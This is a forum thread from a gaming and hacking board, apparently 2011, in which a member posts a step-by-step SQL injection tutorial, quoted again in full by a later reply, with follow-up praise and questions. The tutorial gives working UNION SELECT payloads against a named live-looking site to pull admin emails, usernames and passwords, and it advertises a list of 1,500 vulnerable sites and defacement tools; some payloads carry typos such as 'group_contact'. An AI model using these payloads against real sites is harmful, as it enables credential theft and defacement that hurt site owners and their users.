Login | Register
Results 11 to 20 of 21

Thread: SQL Injection - The Real Tutorial


  1. Join Date Sep 2010

    Posts 1,275

    Membership Banned

    Reputation: 933

    05-08-2011 04:46 AM #1 SQL Injection - The Real Tutorial

    SQL Injection



    Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

    I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is every where on the internet


    So lets get started :y:

    What is SQL Injection?
    SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
    Source: [Only registered and activated users can see links. ]

    SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


    What can I gain from SQL Injecting a website?
    You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date even Credit Card info ect.)
    You can also gain Admin login. After you have that, you can finally deface the site


    [multipage=Getting Started/Finding a Target]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂


    So now you know what SQL injection is, now we can finally get in action :evil:

    First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
    So for me it would be: www.examplewebsite.com/index.php?id=1'
    Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
    or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting . If you get no error, the site is not vulnerable.

    Here is a nice tutorial by my friend Curt on how to find a vulnerable website Thanks to him :y:

    http://www.nextgenupdate.com/forums/...beginners.html

    [multipage=The 1st Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now here is the tutorial. Enjoy and follow all the steps to be successful

    So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information

    So my target today will be:
    Code:
    http://www.novebrno.net/article.php?id=616
    I tested it and it is vulnerable.

    Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself
    So the site should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+ORDER+BY+1--
    Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
    I tested it and I got an error at column 12:


    So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

    So now lets keep going.

    So now we now the 11 available columns, we gotta find the vulnerable column. Just add:
    Code:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
    at the end of the url

    NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

    Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
    But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

    So all we do now is add a - before the number. It should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--
    Now I am getting an error and the number is showing:


    Number 5 is showing on my screen, so now we will keep going with this number.

    So now we have to replace the number 5 with @@version
    Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

    NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

    The URL should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--
    So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables

    IF the database is 4 and lower, it will be hard to get tables, more to read later.

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    Screenie of my database:



    So now we know the database version, now we need to get the tables names.
    To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

    NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... ect.

    The url should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables
    Now you should get the Tables information.

    Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

    If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6, 7,8,9,10,11 from information_schema.tables+where+table_schema=datab ase()

    Now this should work and you should get all the tables information

    Some Tables should be:
    Code:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc
    Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

    So we add this at the end of the url:r
    +UNION+SELECT+1,2,3,4,group_contact(column_name),6 ,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

    So it should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*
    So now lets say we got a 'admin' table, now we will change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin
    You can change the table_name=.. to any table you want to get information from.

    Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: [Only registered and activated users can see links. ] to convert the name admin into hax datas.

    Now change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e
    Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

    Now that will give us all the columns of the table admin. :y:

    Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username, 0x3a,password),3 from admin

    So it should look like:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin
    So now you finally have the passwords, emails and user names

    Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be script kidde ;D


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    Now as pointed before, if you're database is 4 and lower, you have a lil problem and it will be harder to get the tables.

    If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5,column_name,CHAR(5,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

    NOTE: If you have 5 available columns you will have to change it ect...

    Now if you get no error and you see the tables you are fine If not you are fuked and you will probably have to guess the tables

    Here are some known table names:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

    So now I will guess the table name admins on my test url:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin
    Now just keep guessing until you find a table name that works

    Now lets say the following table worked:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users
    Now we will have to guess the columns Yes this is a fuking pain in the ass I know

    Common columns names are:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

    So it should look like this:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users
    Now just keep guessing until one of the columns works.

    Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,p assword),3 from users

    So this will give us the information of the admin

    So this was the tutorial Hope you enjoyed

    [multipage=The 2nd Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

    So this time I will be using a test site, as I don't have time to look for the right vulnerable site
    My site will be called:
    Code:
    www.sqlitestsite.com/index.php/id=234
    So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=234 order by 1/*
    NOTE: You can also use -- instead of /*.

    Now this of course didn't give us an error, so we have to keep trying, just go on with:
    order by 2/*
    NO ERROR
    order by 3/*
    NO ERROR
    order by 4/*
    ERROR

    So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

    Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*
    Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*
    Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information

    So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*
    Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

    So now since there are different methods for the databases I will split now the tutorial.


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    So now we know that the database is version 5 and above. Now we need to find the tables ink:

    We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
    To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
    So it should look like:

    Code:
    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*
    Now you will see a few tables on the screen, but that are not all of them, to find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

    Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

    Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

    Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

    To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information

    In order good tables are:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now we know the tables, now we need to find out the columns.

    To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    So now just replace 0,1 with 1,1, than with 2,1 and so on until you find a useful column as the following:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/
    So now we will get more information about the table "admin"

    So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

    The 0x3a is the hex for a ;.

    Now we will get the information and we are finally done with hacking a database version 5
    [multipage=Conclusion and some Goodies ;D]


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    As Pointed before, I will show you guys now how to get the database info if the version is 4 or below.

    adding soon, gotta do P90x now ;D
    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂

    So guys this was my tutorial on how to SQL Inject websites I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [Only registered and activated users can see links. ]

    Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you


    Now since I am a nice guy, I will provide you guys with some goodies

    List of over 1500 vulnerable sites (found by me):
    DOWNLOAD LINK: [Only registered and activated users can see links. ]


    Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): http://www.nextgenupdate.com/forums/...injection.html


    Want to make a good defacement but you don't know html or php? Use this tool to do the work for you (Must be premium):
    http://www.nextgenupdate.com/forums/...e-creator.html
    Last edited by xTrYiPiCz; 06-12-2011 at 06:19 AM.

  2. gorgorn Gobble

    Join Date Jun 2011

    Posts 2

    Membership Standard

    Reputation: 20

    06-21-2011 08:28 PM #11


    wow.. great tutorial..:y::y:

    i have one question..

    how to make sql injection if the link of a website, there is no have integer number?

    i mean like this :
    Code:
    http://www.examplewebsite.com/index.php?id=ADMIN
    so, the is imposible to making SQL injection of these website..??

    sorry for my bad english...

  3. ᴬustin_Powers's Avatar

    ᴬustin_Powers Do I make you horny?

    Join Date Jan 2011

    Posts 643

    Membership Donator

    Reputation: 738

    06-21-2011 08:32 PM #12

    Quote Originally Posted by gorgorn View Post
    wow.. great tutorial..:y::y:

    i have one question..

    how to make sql injection if the link of a website, there is no have integer number?

    i mean like this :
    Code:
    http://www.examplewebsite.com/index.php?id=ADMIN
    so, the is imposible to making SQL injection of these website..??

    sorry for my bad english...
    You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.

  4. gorgorn Gobble

    Join Date Jun 2011

    Posts 2

    Membership Standard

    Reputation: 20

    06-21-2011 08:43 PM #13

    Quote Originally Posted by ᴬustin_Powers View Post
    You need to find the integer number, if there isn't one, you have to use a different method of hacking the site.
    what is the different method?

    can u tell me more about these..??

  5. Join Date Jun 2011

    Posts 15

    Membership Standard

    Reputation: 70

    06-25-2011 04:05 PM #14

    Nice Post But I Already Know All This Stuff. :y:

  6. 2RAW4THESTREET's Avatar

    2RAW4THESTREET Hit the THANKS button. ;)

    Join Date Jan 2011

    Posts 1,349

    Membership Donator

    Reputation: 5300

    06-26-2011 12:45 PM #15

    Great tutorial bro. Well done.
    [Only registered and activated users can see links. ]

    [Only registered and activated users can see links. ]

    [Only registered and activated users can see links. ]

  7. porsch3 Gobble

    Join Date Aug 2011

    Posts 1

    Membership Standard

    Reputation: 10

    08-13-2011 04:18 AM #16

    nice tutorial

  8. almyz125's Avatar

    almyz125 Save Point

    Join Date Jul 2010

    Posts 8

    Membership Donator

    Reputation: 10

    08-20-2011 02:44 PM #17

    Thanks for the tut.

  9. Ameht!'s Avatar

    Ameht! Dark Knight

    Join Date Jan 2010

    Posts 4,495

    Membership Donator

    Reputation: 754

    08-20-2011 02:56 PM #18

    Quote Originally Posted by xTrYiPiCz View Post
    SQL Injection



    Today I will be showing you guys how to get Database information of a website with the very known exploiting method: SQLi.

    I am making this tutorial in the Computing and Hacking section and not in the premium section as the tutorial should be accessed by all members and not only for premiums as this tutorial is every where on the internet


    So lets get started :y:

    What is SQL Injection?
    SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
    Source: [Only registered and activated users can see links. ]

    SQL Injection is a very well known exploiting method. You can only SQL Inject a website if it's vulnerable to SQLi.


    What can I gain from SQL Injecting a website?
    You basically get ALL the database information of the website. The database includes information about ALL users (Password, Name, Email, Join date even Credit Card info ect.)
    You can also gain Admin login. After you have that, you can finally deface the site


    [multipage=Getting Started/Finding a Target]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Finding a Target █ ▇ ▆ ▅ ▄ ▃ ▂


    So now you know what SQL injection is, now we can finally get in action :evil:

    First of all we need to find a target. The target HAS to be vulnerable to SQLi. To find out if a website is vulnerable to SQLi, simply add a ' at the end of the url.
    So for me it would be: www.examplewebsite.com/index.php?id=1'
    Now press enter, if you get an error that says something like: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
    or something similar. That error is good, as it means that the site is vulnerable, hackable, so now you can simply continue with SQL Injecting . If you get no error, the site is not vulnerable.

    Here is a nice tutorial by my friend Curt on how to find a vulnerable website Thanks to him :y:

    http://www.nextgenupdate.com/forums/...beginners.html

    [multipage=The 1st Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 1 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now here is the tutorial. Enjoy and follow all the steps to be successful

    So now you have your target and you know it is vulnerable to SQLi. Now all we have to do is inject our codes to get the database information

    So my target today will be:
    Code:
    http://www.novebrno.net/article.php?id=616
    I tested it and it is vulnerable.

    Now we are going to add +ORDER+BY+1-- to the site. Now most people that know SQL will ask why not add order by 1--? Mainly because you can change the URL if you add the + to order by 1--, you will find it out yourself
    So the site should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+ORDER+BY+1--
    Now you will be :wtf: I didn't get an error. Well now simply change the 1 at the end of the url to 2, now just keep going until you get an error.
    I tested it and I got an error at column 12:


    So now I got an error at column 12, so there are 11 columns that are available and column 12 doesn't exist.

    So now lets keep going.

    So now we now the 11 available columns, we gotta find the vulnerable column. Just add:
    Code:
    +UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
    at the end of the url

    NOTE: I have UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- because I have 11 available columns, yours might be different.

    Now there should be a number on the screen, it can either only be one of the 11 available columns (in my case).
    But in my case, there are no numbers showing. Why? Because some websites require you to null the value you are injecting into.

    So all we do now is add a - before the number. It should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+union+select+1,2,3,4,5,6,7,8,9,10,11--
    Now I am getting an error and the number is showing:


    Number 5 is showing on my screen, so now we will keep going with this number.

    So now we have to replace the number 5 with @@version
    Add this at the end of the url: +UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--

    NOTE: In my case number 5 is showing, if you have number 3 on the screen it should look like this +UNION+SELECT+1,2,@@version--

    The URL should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,@@version,6,7,8,9,10,11--
    So now you will see a number on the screen, it is the Database version. If the Database is 5 and above, you are fine and it will be easy to get the information and tables

    IF the database is 4 and lower, it will be hard to get tables, more to read later.

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    Screenie of my database:



    So now we know the database version, now we need to get the tables names.
    To do so, add this at the end of the url: +UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables

    NOTE: It should be different in your case, in my case it's 1,2,3,4,table_name,... ect.

    The url should look like this now:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11 from information_schema.tables
    Now you should get the Tables information.

    Sometimes, some of the table names will be cut off, because we are calling the tables from information_schema. So here, we would want to pull the data from the primary database, instead of information_schema.

    If it's that case add this at the end of the url: +UNION+SELECT+1,2,3,4,group_contact(table_name),6, 7,8,9,10,11 from information_schema.tables+where+table_schema=datab ase()

    Now this should work and you should get all the tables information

    Some Tables should be:
    Code:
    About, Admin, Admins, User, Users, Affiliates, Access, Customer, User, Login, terms, posts, etc
    Now we want to get the data from those tables. Well, we will change the data in the vulnerable column from table_name, to column_name

    So we add this at the end of the url:r
    +UNION+SELECT+1,2,3,4,group_contact(column_name),6 ,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*

    So it should look like this:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,2,3,4,group_contact(column_name),6,7,8,9,10,11 from information_schema.columns+where+table_name=*Hexed table name*ed%20table%20name*
    So now lets say we got a 'admin' table, now we will change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=admin
    You can change the table_name=.. to any table you want to get information from.

    Now you will be like wtf? It didn't work, well that is because we didn't hax the table name. So now to hax the table name go to: [Only registered and activated users can see links. ] to convert the name admin into hax datas.

    Now change the url to:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(column_name),3%20from%20information_schema.columns+where+table_name=0x61646d696e
    Admin is 61646d696e in hex, so I changed that at the end of the url. NOTE: you have to add 0x before the numbers.

    Now that will give us all the columns of the table admin. :y:

    Now lets say we got the columns email,password and username, to get the information of them type in the following in the url bar: +UNION+SELECT+1,group_contact(email,0x3a,username, 0x3a,password),3 from admin

    So it should look like:
    Code:
    http://www.novebrno.net/article.php?id=-616+UNION+SELECT+1,group_contact(email,0x3a,username,0x3a,password),3 from admin
    So now you finally have the passwords, emails and user names

    Remember, if your tables are different you also have to change the data with that I provided you. Always think while hacking, don't just be script kidde ;D


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    Now as pointed before, if you're database is 4 and lower, you have a lil problem and it will be harder to get the tables.

    If your database is 4 or lower add the following at the end of the url: +UNION+SELECT+1,concat(table_name,CHAR(5,column_name,CHAR(5,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--

    NOTE: If you have 5 available columns you will have to change it ect...

    Now if you get no error and you see the tables you are fine If not you are fuked and you will probably have to guess the tables

    Here are some known table names:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now just add the following at the end of the url: +UNION+SELECT+1,2,3 from TABLE NAME HERE

    So now I will guess the table name admins on my test url:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from admin
    Now just keep guessing until you find a table name that works

    Now lets say the following table worked:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,2,3 from users
    Now we will have to guess the columns Yes this is a fuking pain in the ass I know

    Common columns names are:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    Now we will test the table name, user_pass type in the following at the end of the url: +UNION+SELECT+1,user_pass,3 from users

    So it should look like this:
    Code:
    www.testwebsite.com/index.php/id=234+UNION+SELECT+1,user_pass,3 from users
    Now just keep guessing until one of the columns works.

    Now for example to get the user name, password and email type in the following at the end of the url: +UNION+SELECT+1,contact(email,0x3a,username,0x3a,p assword),3 from users

    So this will give us the information of the admin

    So this was the tutorial Hope you enjoyed

    [multipage=The 2nd Tutorial]

    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Method 2 █ ▇ ▆ ▅ ▄ ▃ ▂


    So now since there are different ways to SQLi, I will post up 2 methods for you guys :rolleyes:

    So this time I will be using a test site, as I don't have time to look for the right vulnerable site
    My site will be called:
    Code:
    www.sqlitestsite.com/index.php/id=234
    So now we have a target, now we gotta find the available columns. To find them add: order by 1/* at the end of the url, so it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=234 order by 1/*
    NOTE: You can also use -- instead of /*.

    Now this of course didn't give us an error, so we have to keep trying, just go on with:
    order by 2/*
    NO ERROR
    order by 3/*
    NO ERROR
    order by 4/*
    ERROR

    So now we got an error at columns 4, that means there are 3 available columns, as column 4 doesn't exist and gave us the error.

    Now we need to find which column is the one that is vulnerable, to do that add: union all select 1,2,3/* at the end of the url. So it should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,2,3/*
    Now if there are no numbers showing on the screen, add a - before the =. So it should look like:
    Code:
    www.sqlitestsite.com/index.php/id=-234 union all select 1,2,3/*
    Now there is number 2 showing on the screen, so I know, columns 2 is vulnerable and I will be using this one to find out the database information

    So now to find out the database version, we need to replace the vulnerable column with @@database. So add: union all select 1,@@database,3/* at the end of the url. It should look like this:
    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,@@database,3/*
    Now there you should see the database version at the screen. It will either be something like 4.xxx and 5.xxx.

    So now since there are different methods for the databases I will split now the tutorial.


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 5 and above █ ▇ ▆ ▅ ▄ ▃ ▂


    So now we know that the database is version 5 and above. Now we need to find the tables ink:

    We need to replace the vulnerable column with table_name and add information_tables at the end of the url.
    To get the tables add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables/*
    So it should look like:

    Code:
    www.sqlitestsite.com/index.php/id=234  union all select 1,table_name,3 from information_schema.tables/*
    Now you will see a few tables on the screen, but that are not all of them, to find all tables we need to limit the end of the query. We will do that by adding 0,1.. and so on at the end of the url.

    Just add the following at the end of the url: union all select 1,table_name,3 from information_schema.tables limit 0,1/*

    Now we know table one, but that's not enough, we need to get the right table to find out all the user information and also admin login.

    Now to get the 2nd table, we need to replace 0,1, with 1,1 so it should look like: union all select 1,table_name,3 from information_schema.tables limit 1,1/*

    To get the 3rd table we need to replace 1,1 with 2,1, so now you will just have to keep going until you find a useful table that can get us the information

    In order good tables are:
    Code:
    tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins,
    Now we know the tables, now we need to find out the columns.

    To find out the columns we will replace the vulnerable columns with: column_name so just add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns limit 0,1/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
    So now just replace 0,1 with 1,1, than with 2,1 and so on until you find a useful column as the following:
    Code:
    first_name, last_name, email, username, password, pass, user_id, user_pass
    So now we found a good table, lets say we found table admin. To get more info of that table add the following at the end of the url: union all select 1,column_name,3 from information_schema.columns where table_name='admin'/*

    Code:
    www.sqlitestsite.com/index.php/id=234 union all select 1,column_name,3 from information_schema.columns where table_name='admin'/
    So now we will get more information about the table "admin"

    So now we see all the columns in table admin. To get the info of the columns you will have to type in the following, let's say we got column id, password, username: union all select 1,concat(id,0x3a,password,0x3a,username) from users/*

    The 0x3a is the hex for a ;.

    Now we will get the information and we are finally done with hacking a database version 5
    [multipage=Conclusion and some Goodies ;D]


    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - The Tutorial - Database 4 and above █ ▇ ▆ ▅ ▄ ▃ ▂

    As Pointed before, I will show you guys now how to get the database info if the version is 4 or below.

    adding soon, gotta do P90x now ;D
    ▂ ▃ ▄ ▅ ▆ ▇ SQL Injection - Conclusion + Goodies █ ▇ ▆ ▅ ▄ ▃ ▂

    So guys this was my tutorial on how to SQL Inject websites I hope you understood everything, but if not feel free to ask me via private message, post your question below or add me on msn: [Only registered and activated users can see links. ]

    Guys it took me 4 hours to make this fuking thread, so I would appreciate it if you say Thank you


    Now since I am a nice guy, I will provide you guys with some goodies

    List of over 1500 vulnerable sites (found by me):
    DOWNLOAD LINK: [Only registered and activated users can see links. ]


    Too lazy to do the manual SQL Injection? Here is a tutorial on how to SQLi with Havij and SQLi Helper v2.7 (Must be premium): http://www.nextgenupdate.com/forums/...injection.html


    Want to make a good defacement but you don't know html or php? Use this tool to do the work for you (Must be premium):
    http://www.nextgenupdate.com/forums/...e-creator.html



    your the man
    Quote Originally Posted by NeedaLifeSoon View Post
    To me it seems that another underlying problem is the feeling that ex staff is somehow way superior to other members.
    In the way they act and are treated by current staff.
    Very few retired because of fundamental issues on how the site was being run, but all act that way after.

  10. jackf094 Haxor!

    Join Date Oct 2010

    Posts 38

    Membership Standard

    Reputation: 10

    09-22-2011 07:35 AM #19

    I found an error on a site on line 231.

    Do I really need to put [Only registered and activated users can see links. ].... all the way up to 231?!

    There must be an easier way.

    Thanks

  11. Xtension Save Point

    Join Date Sep 2011

    Posts 7

    Membership Standard

    Reputation: 10

    09-29-2011 07:44 PM #20 Google Dorks

    I don't think its good to begin crawling google dorks.
    Try learning something more complicating.

    To learn a good bit before you move to big time shit.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •